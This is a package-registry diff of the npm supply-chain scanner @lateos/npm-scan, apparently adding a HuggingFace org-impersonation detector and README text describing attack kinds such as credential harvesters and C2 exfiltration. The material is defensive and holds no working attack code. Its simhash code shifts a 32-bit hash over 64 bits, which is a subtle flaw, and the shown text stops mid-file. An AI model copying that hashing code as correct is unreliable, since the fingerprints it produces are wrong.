@lateos/npm-scan 0.15.2 → 0.15.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +9 -2
- package/backend/detectors/hf-impersonation/index.js +396 -0
- package/backend/detectors/hf-impersonation/jaro-winkler.js +44 -0
- package/backend/detectors/hf-impersonation/known-orgs.js +5 -0
- package/backend/detectors/hf-impersonation/simhash.js +46 -0
- package/backend/detectors/index.js +4 -0
- package/backend/detectors/mini-shai-hulud/d1-burst-publish.js +42 -0
- package/backend/detectors/mini-shai-hulud/d2-sibling-compromise.js +116 -0
- package/backend/detectors/mini-shai-hulud/d3-slsa-mismatch.js +72 -0
- package/backend/detectors/mini-shai-hulud/d4-maintainer-anomaly.js +45 -0
- package/backend/detectors/mini-shai-hulud/d5-ioc-check.js +95 -0
- package/backend/detectors/mini-shai-hulud/d6-token-exfil.js +38 -0
- package/backend/detectors/mini-shai-hulud/index.js +80 -0
- package/backend/detectors/mini-shai-hulud/iocs.json +47 -0
- package/package.json +1 -1
package/README.md
CHANGED
|
@@ -3,7 +3,7 @@
|
|
|
3
3
|
[](https://www.npmjs.com/package/@lateos/npm-scan)
|
|
4
4
|
[](LICENSING.md)
|
|
5
5
|
[](package.json)
|
|
6
|
-
[](https://github.com/lateos-ai/npm-scan)
|
|
7
7
|
[](https://github.com/lateos-ai/npm-scan)
|
|
8
8
|
[](https://hub.docker.com/r/lateos/npm-scan)
|
|
9
9
|
[](https://github.com/lateos-ai/npm-scan/actions/workflows/publish.yml)
|
|
@@ -24,6 +24,8 @@ The 2025–2026 wave of npm supply chain attacks proved that traditional tooling
|
|
|
24
24
|
|
|
25
25
|
Attackers have moved past simple typosquatting. They now ship **obfuscated preinstall hooks**, **credential harvesters hidden behind environment detection**, **dormant backdoors with time-based activation**, and **worm-style transitive propagation** that spreads through peer dependencies.
|
|
26
26
|
|
|
27
|
+
A growing attack vector is **HuggingFace org impersonation** — packages that masquerade as legitimate HF model repositories (e.g., `0penai/gpt2` instead of `openai/gpt2`) to trick users into downloading malicious model artifacts during CI/CD pipelines, often bundled with suspicious binaries (`.exe`, `.dll`) in model repos that deep-learned tools trust by default.
|
|
28
|
+
|
|
27
29
|
The **Megalodon campaign** (2026) alone compromised 5,500+ repositories via fake GitHub PRs, malicious workflow injection, and cloud credential exfiltration — all coordinated through a single actor automating the entire kill chain. **@lateos/npm-scan** now detects artifacts of this campaign out of the box.
|
|
28
30
|
|
|
29
31
|
**npm audit** checks known CVEs. **Snyk** scans for vulnerabilities. **Socket** looks at package behavior. None of them were designed for the generation of attacks that emerged in 2025 — attacks that look benign until they reach production.
|
|
@@ -45,6 +47,7 @@ The **Megalodon campaign** (2026) alone compromised 5,500+ repositories via fake
|
|
|
45
47
|
| Sandbox evasion detection (ATK-010) | ❌ | ❌ | ❌ | ✅ |
|
|
46
48
|
| Transitive worm propagation (ATK-011) | ❌ | ❌ | ❌ | ✅ |
|
|
47
49
|
| Campaign detection (Megalodon CI/CD) | ❌ | ❌ | ❌ | ✅ |
|
|
50
|
+
| HF model repo impersonation + README clone | ❌ | ❌ | ❌ | ✅ |
|
|
48
51
|
| Attack taxonomy (ATK series) | ❌ | ❌ | ❌ | ✅ |
|
|
49
52
|
| SBOM output (CycloneDX + SPDX) | ❌ | ✅ | ❌ | ✅ |
|
|
50
53
|
| SARIF v2.1 (GitHub Code Scanning) | ❌ | ❌ | ❌ | ✅ |
|
|
@@ -74,6 +77,7 @@ The **Megalodon campaign** (2026) alone compromised 5,500+ repositories via fake
|
|
|
74
77
|
| 🛡️ | **Zero telemetry** | No data leaves your machine. No cloud. No callbacks. |
|
|
75
78
|
| 💾 | **Local scan history** | SQLite-backed persistence, zero external dependencies |
|
|
76
79
|
| 🪝 | **Pre-commit hook** | Block threats before commit — one-liner install, scans `package-lock.json` changes |
|
|
80
|
+
| 🤖 | **HF impersonation detection** | Detects typosquatted HuggingFace orgs (Jaro-Winkler), README clones (SimHash), artifact mismatches (`.exe` in model repos), and new-org amplifier — with lazy two-stage evaluation, zero network in Stage 1 |
|
|
77
81
|
| 📎 | **Yarn + pnpm support** | `scan-lockfile` parses `yarn.lock` and `pnpm-lock.yaml` alongside `package-lock.json` |
|
|
78
82
|
|
|
79
83
|
---
|
|
@@ -283,9 +287,11 @@ npm-scan report --pdf # all scans (premium)
|
|
|
283
287
|
| **ATK-010** | Sandbox evasion / anti-analysis | Behavioral | 🟠 medium | SR-10.3 |
|
|
284
288
|
| **ATK-011** | Transitive propagation (worm-style lateral spread) | Behavioral | 🔴 high | SR-11.4 |
|
|
285
289
|
| **MEGALODON** | Megalodon CI/CD campaign — workflow C2 exfil, credential harvest, publish velocity spike, publisher drift | Static + Registry | ⚫ critical | SR-3.1, SR-7.5 |
|
|
290
|
+
| **HF_IMPERSONATION** | HuggingFace org spoof detection — Jaro-Winkler similarity against 15 known-good orgs, SimHash README clone detection, artifact mismatch (`.exe`/`.dll` in model repos), postinstall escalation, new-org amplifier | Static + Network (Stage 2) | 🔴 high / ⚫ critical | SR-2.1 |
|
|
286
291
|
|
|
287
292
|
> **How evasive attacks are caught:** ATK-009 detects packages that check `process.env.CI`, probe hostnames, or use time-based activation. ATK-010 flags `debugger` statements, `os.hostname()` probes, and env fingerprinting. ATK-011 traces peer dependency graphs to detect worm-like propagation patterns.
|
|
288
293
|
> **MEGALODON** campaign detection analyzes bundled `.github/workflows/` files for C2 co-occurrence and base64 decode chains, scans tarball files for credential + outbound network patterns, detects version publish velocity spikes via npm registry metadata, and identifies publisher account drift — all without any network calls beyond the initial package fetch.
|
|
294
|
+
> **HF_IMPERSONATION** detection uses a lazy two-stage evaluation: Stage 1 scans `package.json` scripts and JS/TS sources for HuggingFace references (URLs, `from_pretrained()`, `hub.download()`) and runs Jaro-Winkler similarity against 15 known-good HF orgs — zero network. If spoofs are found, Stage 2 fetches the HF model API, computes SimHash of both READMEs for clone detection, validates artifact type consistency (e.g., `transformers` library with `.exe` files is flagged as critical), applies a new-org amplifier (<30 days), and escalates when the reference appears in a lifecycle script.
|
|
289
295
|
> See [`docs/attack-taxonomy.md`](docs/attack-taxonomy.md) for full evasion surface documentation and PoC examples.
|
|
290
296
|
|
|
291
297
|
---
|
|
@@ -632,7 +638,7 @@ See the [Docker quick-start section](#-run-lateosnpm-scan-anywhere-with-docker--
|
|
|
632
638
|
|
|
633
639
|
### Free tier (shipped)
|
|
634
640
|
|
|
635
|
-
- All 11 ATK detectors + **MEGALODON** CI/CD campaign detection (D1–D6)
|
|
641
|
+
- All 11 ATK detectors + **MEGALODON** CI/CD campaign detection (D1–D6) + **HF_IMPERSONATION** detector
|
|
636
642
|
- SBOM output (CycloneDX + SPDX)
|
|
637
643
|
- HTML, text, and compliance reports (NIST + EU CRA)
|
|
638
644
|
- Policy-as-code engine (YAML)
|
|
@@ -701,6 +707,7 @@ node --test test/detectors-corpus.test.js
|
|
|
701
707
|
- `test/report-snapshots.test.js` — HTML/text/CRA/PDF format assertions
|
|
702
708
|
- `test/report.test.js` — SARIF, CSV, STIG, risk score format tests
|
|
703
709
|
- `test/lockfile.test.js` — npm/yarn/pnpm parser, auto-detect, ATK-007/011 lockfile tests
|
|
710
|
+
- `test/hf-impersonation.test.js` — 13 HF impersonation detection tests (no-ref, exact match, spoof, README clone, artifact mismatch, postinstall escalation, new-org tag)
|
|
704
711
|
- `test/cli.test.js` — commander integration tests (help, version, scan, report, error handling)
|
|
705
712
|
- `test/cli-lockfile.test.js` — scan-lockfile CLI options, yarn/pnpm/monorepo/watch tests
|
|
706
713
|
|
|
@@ -0,0 +1,396 @@
|
|
|
1
|
+
import { KNOWN_HF_ORGS } from './known-orgs.js';
|
|
2
|
+
import { jaroWinkler } from './jaro-winkler.js';
|
|
3
|
+
import { simhash, similarity as simhashSimilarity } from './simhash.js';
|
|
4
|
+
|
|
5
|
+
const HF_URL_PATTERN = /(?:huggingface\.co|hf\.co)\/([^\/\s"'>]+)\/([^\/\s"'>]+)/g;
|
|
6
|
+
const FROM_PRETRAINED_PATTERN = /from_pretrained\(\s*["']([^"']+\/[^"']+)["']/g;
|
|
7
|
+
const HUB_DOWNLOAD_SINGLE = /hub\.download\(\s*["']([^"']+\/[^"']+)["']/g;
|
|
8
|
+
const HUB_DOWNLOAD_DOUBLE = /hub\.download\(\s*["']([^"']+)["']\s*,\s*["']([^"']+)["']/g;
|
|
9
|
+
|
|
10
|
+
const LIFECYCLE_SCRIPTS = new Set(['postinstall', 'prepare', 'install']);
|
|
11
|
+
const API_BASE = 'https://huggingface.co';
|
|
12
|
+
|
|
13
|
+
const SEVERITY_SCORE = { none: 0, low: 1, medium: 2, high: 3, critical: 4 };
|
|
14
|
+
const SEVERITY_LABELS = ['none', 'low', 'medium', 'high', 'critical'];
|
|
15
|
+
|
|
16
|
+
const HF_ARTIFACT_LIBS = new Set(['transformers', 'diffusers', 'sentence-transformers', 'gguf', 'safetensors']);
|
|
17
|
+
const SUSPICIOUS_EXTENSIONS = /\.(exe|msi|bat|ps1|dll)$/i;
|
|
18
|
+
|
|
19
|
+
const _cache = new Map();
|
|
20
|
+
const CACHE_TTL = 3600 * 1000;
|
|
21
|
+
let _lastFetchTime = 0;
|
|
22
|
+
|
|
23
|
+
function severityIndex(sev) {
|
|
24
|
+
return SEVERITY_SCORE[sev] || 0;
|
|
25
|
+
}
|
|
26
|
+
|
|
27
|
+
function maxSeverity(a, b) {
|
|
28
|
+
return severityIndex(a) >= severityIndex(b) ? a : b;
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
function sleep(ms) {
|
|
32
|
+
return new Promise(r => setTimeout(r, ms));
|
|
33
|
+
}
|
|
34
|
+
|
|
35
|
+
async function fetchWithCache(url) {
|
|
36
|
+
const cached = _cache.get(url);
|
|
37
|
+
if (cached && Date.now() - cached.fetchedAt < CACHE_TTL) {
|
|
38
|
+
return cached.data;
|
|
39
|
+
}
|
|
40
|
+
const now = Date.now();
|
|
41
|
+
const elapsed = now - _lastFetchTime;
|
|
42
|
+
if (elapsed < 100) {
|
|
43
|
+
await sleep(100 - elapsed);
|
|
44
|
+
}
|
|
45
|
+
_lastFetchTime = Date.now();
|
|
46
|
+
let res;
|
|
47
|
+
try {
|
|
48
|
+
res = await fetch(url);
|
|
49
|
+
if (res.status === 429) {
|
|
50
|
+
const retryAfter = parseInt(res.headers.get('Retry-After') || '5', 10);
|
|
51
|
+
await sleep(retryAfter * 1000);
|
|
52
|
+
res = await fetch(url);
|
|
53
|
+
}
|
|
54
|
+
if (!res.ok) {
|
|
55
|
+
console.debug(`HF API warning: ${url} returned ${res.status}`);
|
|
56
|
+
return null;
|
|
57
|
+
}
|
|
58
|
+
const data = await res.json();
|
|
59
|
+
_cache.set(url, { data, fetchedAt: Date.now() });
|
|
60
|
+
return data;
|
|
61
|
+
} catch (err) {
|
|
62
|
+
console.debug(`HF API warning: ${err.message}`);
|
|
63
|
+
return null;
|
|
64
|
+
}
|
|
65
|
+
}
|
|
66
|
+
|
|
67
|
+
async function fetchReadme(url) {
|
|
68
|
+
const cached = _cache.get(url);
|
|
69
|
+
if (cached && Date.now() - cached.fetchedAt < CACHE_TTL) {
|
|
70
|
+
return cached.data;
|
|
71
|
+
}
|
|
72
|
+
const now = Date.now();
|
|
73
|
+
const elapsed = now - _lastFetchTime;
|
|
74
|
+
if (elapsed < 100) {
|
|
75
|
+
await sleep(100 - elapsed);
|
|
76
|
+
}
|
|
77
|
+
_lastFetchTime = Date.now();
|
|
78
|
+
try {
|
|
79
|
+
const res = await fetch(url);
|
|
80
|
+
if (res.status === 429) {
|
|
81
|
+
const retryAfter = parseInt(res.headers.get('Retry-After') || '5', 10);
|
|
82
|
+
await sleep(retryAfter * 1000);
|
|
83
|
+
const retryRes = await fetch(url);
|
|
84
|
+
if (!retryRes.ok) return null;
|
|
85
|
+
const text = await retryRes.text();
|
|
86
|
+
_cache.set(url, { data: text, fetchedAt: Date.now() });
|
|
87
|
+
return text;
|
|
88
|
+
}
|
|
89
|
+
if (!res.ok) return null;
|
|
90
|
+
const text = await res.text();
|
|
91
|
+
_cache.set(url, { data: text, fetchedAt: Date.now() });
|
|
92
|
+
return text;
|
|
93
|
+
} catch (err) {
|
|
94
|
+
console.debug(`HF README warning: ${err.message}`);
|
|
95
|
+
return null;
|
|
96
|
+
}
|
|
97
|
+
}
|
|
98
|
+
|
|
99
|
+
function findClosestOrg(spoofedOrg) {
|
|
100
|
+
const lowerOrg = String(spoofedOrg).toLowerCase();
|
|
101
|
+
let best = { org: null, score: 0 };
|
|
102
|
+
for (const known of KNOWN_HF_ORGS) {
|
|
103
|
+
const score = jaroWinkler(lowerOrg, known.toLowerCase());
|
|
104
|
+
if (score >= 0.82 && score > best.score) {
|
|
105
|
+
best = { org: known, score };
|
|
106
|
+
}
|
|
107
|
+
}
|
|
108
|
+
return best;
|
|
109
|
+
}
|
|
110
|
+
|
|
111
|
+
function extractHFTuples(pkgJson, allFiles) {
|
|
112
|
+
const tuples = new Set();
|
|
113
|
+
let postinstallFetchFlag = false;
|
|
114
|
+
|
|
115
|
+
const scripts = pkgJson?.scripts || {};
|
|
116
|
+
let m;
|
|
117
|
+
for (const [hook, script] of Object.entries(scripts)) {
|
|
118
|
+
if (typeof script !== 'string') continue;
|
|
119
|
+
|
|
120
|
+
HF_URL_PATTERN.lastIndex = 0;
|
|
121
|
+
while ((m = HF_URL_PATTERN.exec(script)) !== null) {
|
|
122
|
+
tuples.add(`${m[1]}/${m[2]}`);
|
|
123
|
+
if (LIFECYCLE_SCRIPTS.has(hook)) {
|
|
124
|
+
postinstallFetchFlag = true;
|
|
125
|
+
}
|
|
126
|
+
}
|
|
127
|
+
|
|
128
|
+
FROM_PRETRAINED_PATTERN.lastIndex = 0;
|
|
129
|
+
while ((m = FROM_PRETRAINED_PATTERN.exec(script)) !== null) {
|
|
130
|
+
tuples.add(m[1]);
|
|
131
|
+
if (LIFECYCLE_SCRIPTS.has(hook)) {
|
|
132
|
+
postinstallFetchFlag = true;
|
|
133
|
+
}
|
|
134
|
+
}
|
|
135
|
+
|
|
136
|
+
HUB_DOWNLOAD_SINGLE.lastIndex = 0;
|
|
137
|
+
while ((m = HUB_DOWNLOAD_SINGLE.exec(script)) !== null) {
|
|
138
|
+
tuples.add(m[1]);
|
|
139
|
+
if (LIFECYCLE_SCRIPTS.has(hook)) {
|
|
140
|
+
postinstallFetchFlag = true;
|
|
141
|
+
}
|
|
142
|
+
}
|
|
143
|
+
|
|
144
|
+
HUB_DOWNLOAD_DOUBLE.lastIndex = 0;
|
|
145
|
+
while ((m = HUB_DOWNLOAD_DOUBLE.exec(script)) !== null) {
|
|
146
|
+
tuples.add(`${m[1]}/${m[2]}`);
|
|
147
|
+
if (LIFECYCLE_SCRIPTS.has(hook)) {
|
|
148
|
+
postinstallFetchFlag = true;
|
|
149
|
+
}
|
|
150
|
+
}
|
|
151
|
+
}
|
|
152
|
+
|
|
153
|
+
if (allFiles) {
|
|
154
|
+
for (const file of allFiles) {
|
|
155
|
+
if (!file.path?.match(/\.(js|ts|jsx|tsx|mjs|cjs)$/i)) continue;
|
|
156
|
+
const content = typeof file.content === 'string' ? file.content : '';
|
|
157
|
+
|
|
158
|
+
HF_URL_PATTERN.lastIndex = 0;
|
|
159
|
+
while ((m = HF_URL_PATTERN.exec(content)) !== null) {
|
|
160
|
+
tuples.add(`${m[1]}/${m[2]}`);
|
|
161
|
+
}
|
|
162
|
+
|
|
163
|
+
FROM_PRETRAINED_PATTERN.lastIndex = 0;
|
|
164
|
+
while ((m = FROM_PRETRAINED_PATTERN.exec(content)) !== null) {
|
|
165
|
+
tuples.add(m[1]);
|
|
166
|
+
}
|
|
167
|
+
|
|
168
|
+
HUB_DOWNLOAD_SINGLE.lastIndex = 0;
|
|
169
|
+
while ((m = HUB_DOWNLOAD_SINGLE.exec(content)) !== null) {
|
|
170
|
+
tuples.add(m[1]);
|
|
171
|
+
}
|
|
172
|
+
|
|
173
|
+
HUB_DOWNLOAD_DOUBLE.lastIndex = 0;
|
|
174
|
+
while ((m = HUB_DOWNLOAD_DOUBLE.exec(content)) !== null) {
|
|
175
|
+
tuples.add(`${m[1]}/${m[2]}`);
|
|
176
|
+
}
|
|
177
|
+
}
|
|
178
|
+
}
|
|
179
|
+
|
|
180
|
+
return { tuples, postinstallFetchFlag };
|
|
181
|
+
}
|
|
182
|
+
|
|
183
|
+
function buildHFOrgSpoofFinding(referencedRepo, org, canonicalOrg, similarityScore, postinstallFetchFlag, tags, hfMeta) {
|
|
184
|
+
const finding = {
|
|
185
|
+
id: 'HF_ORG_SPOOF',
|
|
186
|
+
severity: 'high',
|
|
187
|
+
title: 'HuggingFace org impersonation',
|
|
188
|
+
description: `Repository "${referencedRepo}" references org "${org}" which is similar to known HF org "${canonicalOrg.org}" (similarity: ${similarityScore.toFixed(3)})`,
|
|
189
|
+
evidence: JSON.stringify({
|
|
190
|
+
referencedRepo,
|
|
191
|
+
canonicalOrg: canonicalOrg.org,
|
|
192
|
+
similarityScore,
|
|
193
|
+
tags: tags || [],
|
|
194
|
+
}),
|
|
195
|
+
referencedRepo,
|
|
196
|
+
canonicalOrg: canonicalOrg.org,
|
|
197
|
+
similarityScore,
|
|
198
|
+
tags: tags || [],
|
|
199
|
+
ipiClass: 'SUPPLY_CHAIN',
|
|
200
|
+
};
|
|
201
|
+
if (hfMeta) {
|
|
202
|
+
finding.hfMeta = hfMeta;
|
|
203
|
+
}
|
|
204
|
+
return finding;
|
|
205
|
+
}
|
|
206
|
+
|
|
207
|
+
async function runStage2(spoofFindings, orgsToCheck, postinstallFetchFlag) {
|
|
208
|
+
const newFindings = [];
|
|
209
|
+
|
|
210
|
+
for (const [referencedRepo, { org, canonicalOrg, similarityScore, finding }] of orgsToCheck) {
|
|
211
|
+
const tags = [];
|
|
212
|
+
let hfMeta = null;
|
|
213
|
+
|
|
214
|
+
const modelUrl = `${API_BASE}/api/models/${referencedRepo}`;
|
|
215
|
+
const canonicalUrl = canonicalOrg.org !== org ? `${API_BASE}/api/models/${canonicalOrg.org}/${referencedRepo.split('/')[1]}` : null;
|
|
216
|
+
const userUrl = `${API_BASE}/api/users/${org}`;
|
|
217
|
+
|
|
218
|
+
const spoofedModel = await fetchWithCache(modelUrl);
|
|
219
|
+
const canonicalModel = canonicalUrl ? await fetchWithCache(canonicalUrl) : null;
|
|
220
|
+
const userData = await fetchWithCache(userUrl);
|
|
221
|
+
|
|
222
|
+
// Org age check for NEW_ORG tag
|
|
223
|
+
if (userData?.dateCreated) {
|
|
224
|
+
const created = new Date(userData.dateCreated);
|
|
225
|
+
const ageDays = (Date.now() - created.getTime()) / (1000 * 60 * 60 * 24);
|
|
226
|
+
hfMeta = {
|
|
227
|
+
orgAgeDays: Math.round(ageDays),
|
|
228
|
+
repoDownloads: spoofedModel?.downloads ?? 0,
|
|
229
|
+
};
|
|
230
|
+
if (ageDays < 30) {
|
|
231
|
+
tags.push('NEW_ORG');
|
|
232
|
+
}
|
|
233
|
+
}
|
|
234
|
+
|
|
235
|
+
// README clone check
|
|
236
|
+
if (canonicalOrg.org !== org) {
|
|
237
|
+
const readmeSpoof = await fetchReadme(`${API_BASE}/${referencedRepo}/resolve/main/README.md`);
|
|
238
|
+
const readmeCanonical = await fetchReadme(`${API_BASE}/${canonicalOrg.org}/${referencedRepo.split('/')[1]}/resolve/main/README.md`);
|
|
239
|
+
|
|
240
|
+
if (readmeSpoof && readmeCanonical) {
|
|
241
|
+
const fp1 = simhash(readmeSpoof);
|
|
242
|
+
const fp2 = simhash(readmeCanonical);
|
|
243
|
+
const simScore = simhashSimilarity(fp1, fp2);
|
|
244
|
+
|
|
245
|
+
if (simScore >= 0.9) {
|
|
246
|
+
const readmeFinding = {
|
|
247
|
+
id: 'HF_README_CLONE',
|
|
248
|
+
severity: 'high',
|
|
249
|
+
title: 'HuggingFace README clone',
|
|
250
|
+
description: `README of "${referencedRepo}" is highly similar (${(simScore * 100).toFixed(1)}%) to canonical org "${canonicalOrg.org}/${referencedRepo.split('/')[1]}"`,
|
|
251
|
+
evidence: JSON.stringify({
|
|
252
|
+
referencedRepo,
|
|
253
|
+
canonicalOrg: canonicalOrg.org,
|
|
254
|
+
similarityScore: simScore,
|
|
255
|
+
tags: [],
|
|
256
|
+
}),
|
|
257
|
+
referencedRepo,
|
|
258
|
+
canonicalOrg: canonicalOrg.org,
|
|
259
|
+
similarityScore: simScore,
|
|
260
|
+
tags: [],
|
|
261
|
+
ipiClass: 'SUPPLY_CHAIN',
|
|
262
|
+
};
|
|
263
|
+
if (hfMeta) readmeFinding.hfMeta = hfMeta;
|
|
264
|
+
newFindings.push(readmeFinding);
|
|
265
|
+
}
|
|
266
|
+
}
|
|
267
|
+
}
|
|
268
|
+
|
|
269
|
+
// Artifact mismatch check
|
|
270
|
+
if (spoofedModel?.cardData?.library_name && spoofedModel?.siblings) {
|
|
271
|
+
const libName = spoofedModel.cardData.library_name;
|
|
272
|
+
if (HF_ARTIFACT_LIBS.has(libName)) {
|
|
273
|
+
for (const sibling of spoofedModel.siblings) {
|
|
274
|
+
const fn = sibling.rfilename || '';
|
|
275
|
+
if (SUSPICIOUS_EXTENSIONS.test(fn)) {
|
|
276
|
+
const artifactFinding = {
|
|
277
|
+
id: 'HF_ARTIFACT_MISMATCH',
|
|
278
|
+
severity: 'critical',
|
|
279
|
+
title: 'HF artifact mismatch — suspicious binary in model repo',
|
|
280
|
+
description: `Model "${referencedRepo}" declares library "${libName}" but contains suspicious file "${fn}"`,
|
|
281
|
+
evidence: JSON.stringify({
|
|
282
|
+
referencedRepo,
|
|
283
|
+
artifactConflict: { declaredType: libName, suspiciousFilename: fn },
|
|
284
|
+
tags: [],
|
|
285
|
+
}),
|
|
286
|
+
referencedRepo,
|
|
287
|
+
artifactConflict: { declaredType: libName, suspiciousFilename: fn },
|
|
288
|
+
tags: [],
|
|
289
|
+
ipiClass: 'SUPPLY_CHAIN',
|
|
290
|
+
};
|
|
291
|
+
if (hfMeta) artifactFinding.hfMeta = hfMeta;
|
|
292
|
+
newFindings.push(artifactFinding);
|
|
293
|
+
break;
|
|
294
|
+
}
|
|
295
|
+
}
|
|
296
|
+
}
|
|
297
|
+
}
|
|
298
|
+
|
|
299
|
+
// Apply NEW_ORG and POSTINSTALL_FETCH tags to all findings for this repo
|
|
300
|
+
const repoSpoofFindings = spoofFindings.filter(f => f.referencedRepo === referencedRepo);
|
|
301
|
+
for (const sf of repoSpoofFindings) {
|
|
302
|
+
if (tags.length > 0) {
|
|
303
|
+
if (!sf.tags) sf.tags = [];
|
|
304
|
+
for (const t of tags) {
|
|
305
|
+
if (!sf.tags.includes(t)) sf.tags.push(t);
|
|
306
|
+
}
|
|
307
|
+
}
|
|
308
|
+
if (hfMeta) {
|
|
309
|
+
sf.hfMeta = hfMeta;
|
|
310
|
+
}
|
|
311
|
+
}
|
|
312
|
+
for (const nf of newFindings) {
|
|
313
|
+
if (nf.referencedRepo === referencedRepo) {
|
|
314
|
+
if (tags.length > 0) {
|
|
315
|
+
if (!nf.tags) nf.tags = [];
|
|
316
|
+
for (const t of tags) {
|
|
317
|
+
if (!nf.tags.includes(t)) nf.tags.push(t);
|
|
318
|
+
}
|
|
319
|
+
}
|
|
320
|
+
}
|
|
321
|
+
}
|
|
322
|
+
}
|
|
323
|
+
|
|
324
|
+
// POSTINSTALL_FETCH escalation
|
|
325
|
+
if (postinstallFetchFlag) {
|
|
326
|
+
const allStage2Findings = [...spoofFindings, ...newFindings];
|
|
327
|
+
const escalatedRepos = new Set();
|
|
328
|
+
for (const f of allStage2Findings) {
|
|
329
|
+
if (f.referencedRepo) escalatedRepos.add(f.referencedRepo);
|
|
330
|
+
}
|
|
331
|
+
for (const f of allStage2Findings) {
|
|
332
|
+
if (escalatedRepos.has(f.referencedRepo)) {
|
|
333
|
+
if (severityIndex(f.severity) < severityIndex('critical')) {
|
|
334
|
+
f.severity = 'critical';
|
|
335
|
+
}
|
|
336
|
+
if (!f.tags) f.tags = [];
|
|
337
|
+
if (!f.tags.includes('POSTINSTALL_ESCALATED')) {
|
|
338
|
+
f.tags.push('POSTINSTALL_ESCALATED');
|
|
339
|
+
}
|
|
340
|
+
}
|
|
341
|
+
}
|
|
342
|
+
}
|
|
343
|
+
|
|
344
|
+
return newFindings;
|
|
345
|
+
}
|
|
346
|
+
|
|
347
|
+
export async function scan(pkgJson, files = [], registryMeta = null, allFiles = null) {
|
|
348
|
+
const { tuples, postinstallFetchFlag } = extractHFTuples(pkgJson, allFiles || files);
|
|
349
|
+
|
|
350
|
+
if (tuples.size === 0) return [];
|
|
351
|
+
|
|
352
|
+
// Stage 1: org spoof detection (local only)
|
|
353
|
+
const spoofFindings = [];
|
|
354
|
+
const orgsToCheck = []; // [referencedRepo, { org, canonicalOrg, similarityScore, finding }]
|
|
355
|
+
|
|
356
|
+
for (const tuple of tuples) {
|
|
357
|
+
const parts = tuple.split('/');
|
|
358
|
+
if (parts.length < 2) continue;
|
|
359
|
+
const org = parts[0];
|
|
360
|
+
|
|
361
|
+
const canonicalOrg = findClosestOrg(org);
|
|
362
|
+
if (!canonicalOrg.org) continue;
|
|
363
|
+
if (org.toLowerCase() === canonicalOrg.org.toLowerCase()) continue;
|
|
364
|
+
|
|
365
|
+
const finding = buildHFOrgSpoofFinding(tuple, org, canonicalOrg, canonicalOrg.score, postinstallFetchFlag, []);
|
|
366
|
+
spoofFindings.push(finding);
|
|
367
|
+
orgsToCheck.push([tuple, { org, canonicalOrg, similarityScore: canonicalOrg.score, finding }]);
|
|
368
|
+
}
|
|
369
|
+
|
|
370
|
+
if (spoofFindings.length === 0) return [];
|
|
371
|
+
|
|
372
|
+
// Stage 2: network checks
|
|
373
|
+
const stage2Findings = await runStage2(spoofFindings, orgsToCheck, postinstallFetchFlag);
|
|
374
|
+
|
|
375
|
+
// Deduplicate POSTINSTALL_ESCALATED tag in evidence
|
|
376
|
+
for (const f of [...spoofFindings, ...stage2Findings]) {
|
|
377
|
+
if (f.tags && f.tags.length > 0) {
|
|
378
|
+
try {
|
|
379
|
+
const ev = JSON.parse(f.evidence);
|
|
380
|
+
ev.tags = [...f.tags];
|
|
381
|
+
f.evidence = JSON.stringify(ev);
|
|
382
|
+
} catch {
|
|
383
|
+
// evidence wasn't JSON, leave as-is
|
|
384
|
+
}
|
|
385
|
+
}
|
|
386
|
+
}
|
|
387
|
+
|
|
388
|
+
return [...spoofFindings, ...stage2Findings];
|
|
389
|
+
}
|
|
390
|
+
|
|
391
|
+
export function clearCache() {
|
|
392
|
+
_cache.clear();
|
|
393
|
+
_lastFetchTime = 0;
|
|
394
|
+
}
|
|
395
|
+
|
|
396
|
+
export { KNOWN_HF_ORGS, jaroWinkler, simhash, simhashSimilarity };
|
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
export function jaroWinkler(s1, s2) {
|
|
2
|
+
if (s1 === s2) return 1;
|
|
3
|
+
const len1 = s1.length, len2 = s2.length;
|
|
4
|
+
if (len1 === 0 || len2 === 0) return 0;
|
|
5
|
+
|
|
6
|
+
const matchDist = Math.floor(Math.max(len1, len2) / 2) - 1;
|
|
7
|
+
const matches1 = new Array(len1).fill(false);
|
|
8
|
+
const matches2 = new Array(len2).fill(false);
|
|
9
|
+
let matches = 0;
|
|
10
|
+
|
|
11
|
+
for (let i = 0; i < len1; i++) {
|
|
12
|
+
const start = Math.max(0, i - matchDist);
|
|
13
|
+
const end = Math.min(len2, i + matchDist + 1);
|
|
14
|
+
for (let j = start; j < end; j++) {
|
|
15
|
+
if (matches2[j]) continue;
|
|
16
|
+
if (s1[i] !== s2[j]) continue;
|
|
17
|
+
matches1[i] = true;
|
|
18
|
+
matches2[j] = true;
|
|
19
|
+
matches++;
|
|
20
|
+
break;
|
|
21
|
+
}
|
|
22
|
+
}
|
|
23
|
+
|
|
24
|
+
if (matches === 0) return 0;
|
|
25
|
+
|
|
26
|
+
let transpositions = 0, k = 0;
|
|
27
|
+
for (let i = 0; i < len1; i++) {
|
|
28
|
+
if (!matches1[i]) continue;
|
|
29
|
+
while (!matches2[k]) k++;
|
|
30
|
+
if (s1[i] !== s2[k]) transpositions++;
|
|
31
|
+
k++;
|
|
32
|
+
}
|
|
33
|
+
|
|
34
|
+
const jaro = (matches / len1 + matches / len2 + (matches - transpositions / 2) / matches) / 3;
|
|
35
|
+
|
|
36
|
+
let prefix = 0;
|
|
37
|
+
const maxPrefix = Math.min(4, len1, len2);
|
|
38
|
+
for (let i = 0; i < maxPrefix; i++) {
|
|
39
|
+
if (s1[i] === s2[i]) prefix++;
|
|
40
|
+
else break;
|
|
41
|
+
}
|
|
42
|
+
|
|
43
|
+
return jaro + prefix * 0.1 * (1 - jaro);
|
|
44
|
+
}
|
|
@@ -0,0 +1,46 @@
|
|
|
1
|
+
function hashToken(str) {
|
|
2
|
+
let hash = 5381;
|
|
3
|
+
for (let i = 0; i < str.length; i++) {
|
|
4
|
+
hash = ((hash << 5) + hash) + str.charCodeAt(i);
|
|
5
|
+
hash = hash & hash;
|
|
6
|
+
}
|
|
7
|
+
return hash >>> 0;
|
|
8
|
+
}
|
|
9
|
+
|
|
10
|
+
export function simhash(text) {
|
|
11
|
+
const v = new Array(64).fill(0);
|
|
12
|
+
const tokens = text.toLowerCase().split(/\s+/).filter(Boolean);
|
|
13
|
+
|
|
14
|
+
for (const token of tokens) {
|
|
15
|
+
const h = hashToken(token);
|
|
16
|
+
for (let i = 0; i < 64; i++) {
|
|
17
|
+
if ((h >> i) & 1) {
|
|
18
|
+
v[i] += 1;
|
|
19
|
+
} else {
|
|
20
|
+
v[i] -= 1;
|
|
21
|
+
}
|
|
